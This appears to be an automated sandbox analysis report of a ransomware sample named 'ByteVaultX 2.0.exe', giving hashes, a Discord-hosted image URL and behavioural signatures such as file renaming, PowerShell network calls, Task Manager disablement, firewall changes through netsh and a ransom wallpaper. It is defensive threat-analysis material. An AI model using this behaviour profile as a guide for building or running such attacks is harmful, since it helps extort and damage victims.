Analysis
-
max time kernel
931s -
max time network
1035s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25/05/2024, 23:42
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win11-20240426-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
d4c033244c9bf694cf7063f136b01e30
-
SHA1
a460178565327d0a0b756d165ff0fa3aae5f7abe
-
SHA256
1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
-
SHA512
78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d
-
SSDEEP
196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (132) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 31 IoCs
flow pid Process 17 4572 powershell.exe 34 320 powershell.exe 37 4524 powershell.exe 44 4884 powershell.exe 45 2448 powershell.exe 46 2684 powershell.exe 47 4040 powershell.exe 48 772 powershell.exe 49 4488 powershell.exe 50 4800 powershell.exe 53 4588 powershell.exe 55 4836 powershell.exe 56 1748 powershell.exe 57 4616 powershell.exe 58 3700 powershell.exe 59 3872 powershell.exe 64 2228 powershell.exe 67 3520 powershell.exe 69 2740 powershell.exe 70 2220 powershell.exe 71 4904 powershell.exe 73 836 powershell.exe 74 2872 powershell.exe 75 1340 powershell.exe 77 3588 powershell.exe 78 2044 powershell.exe 79 4580 powershell.exe 81 1912 powershell.exe 83 456 powershell.exe 85 448 powershell.exe 86 1236 powershell.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
pid Process 4380 netsh.exe 2672 netsh.exe 1680 netsh.exe 3596 netsh.exe 1840 netsh.exe 3708 netsh.exe 2868 netsh.exe 3436 netsh.exe 3640 netsh.exe 880 netsh.exe 1840 Process not Found 4176 Process not Found 4864 netsh.exe 4152 Process not Found 1792 netsh.exe 4584 netsh.exe 2264 netsh.exe 1384 netsh.exe 2388 netsh.exe 3716 netsh.exe 3036 netsh.exe 2564 netsh.exe 4576 Process not Found 4956 netsh.exe 2292 netsh.exe 4236 netsh.exe 3524 netsh.exe 5060 netsh.exe 3392 netsh.exe 1076 netsh.exe 3240 Process not Found 3552 netsh.exe 4984 netsh.exe 1232 netsh.exe 5060 netsh.exe 1872 netsh.exe 3600 Process not Found 4512 netsh.exe 4040 netsh.exe 4984 netsh.exe 5000 netsh.exe 1816 netsh.exe 2004 netsh.exe 668 Process not Found 1036 Process not Found 2384 netsh.exe 3024 netsh.exe 2624 netsh.exe 2984 netsh.exe 2684 netsh.exe 2164 netsh.exe 3036 netsh.exe 2384 netsh.exe 3556 Process not Found 4168 netsh.exe 4924 netsh.exe 440 netsh.exe 2800 netsh.exe 1792 netsh.exe 2288 Process not Found 4512 netsh.exe 4572 netsh.exe 3344 netsh.exe 2524 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation ByteVaultX 2.0.exe -
Loads dropped DLL 12 IoCs
pid Process 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe 2212 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe -
pid Process 4108 powershell.exe 1108 powershell.exe 3944 powershell.exe 416 powershell.exe 5060 powershell.exe 2996 powershell.exe 3716 Process not Found 4132 powershell.exe 2928 powershell.exe 4676 Process not Found 1336 powershell.exe 1772 powershell.exe 1828 powershell.exe 912 powershell.exe 1632 powershell.exe 4484 powershell.exe 3024 powershell.exe 2176 powershell.exe 2524 powershell.exe 4524 powershell.exe 4504 Process not Found 4532 powershell.exe 3520 powershell.exe 4008 powershell.exe 2740 powershell.exe 1136 powershell.exe 4532 powershell.exe 1448 powershell.exe 4152 powershell.exe 244 powershell.exe 2072 powershell.exe 4128 powershell.exe 4432 powershell.exe 4936 powershell.exe 3320 powershell.exe 1708 powershell.exe 2684 powershell.exe 1076 powershell.exe 2984 powershell.exe 2148 powershell.exe 532 powershell.exe 2164 powershell.exe 3236 powershell.exe 448 powershell.exe 2624 powershell.exe 4524 powershell.exe 888 powershell.exe 3524 powershell.exe 3588 powershell.exe 4492 Process not Found 4128 Process not Found 4356 Process not Found 2968 powershell.exe 1088 powershell.exe 4564 powershell.exe 2916 powershell.exe 2964 powershell.exe 1076 Process not Found 2524 powershell.exe 3052 powershell.exe 2396 powershell.exe 2244 powershell.exe 5100 powershell.exe 204 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 36 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = eb839459fdaeda01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2a59ea59fdaeda01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz! MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 901e8d74fdaeda01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 578f425afdaeda01 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f0fbf56cfdaeda01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History 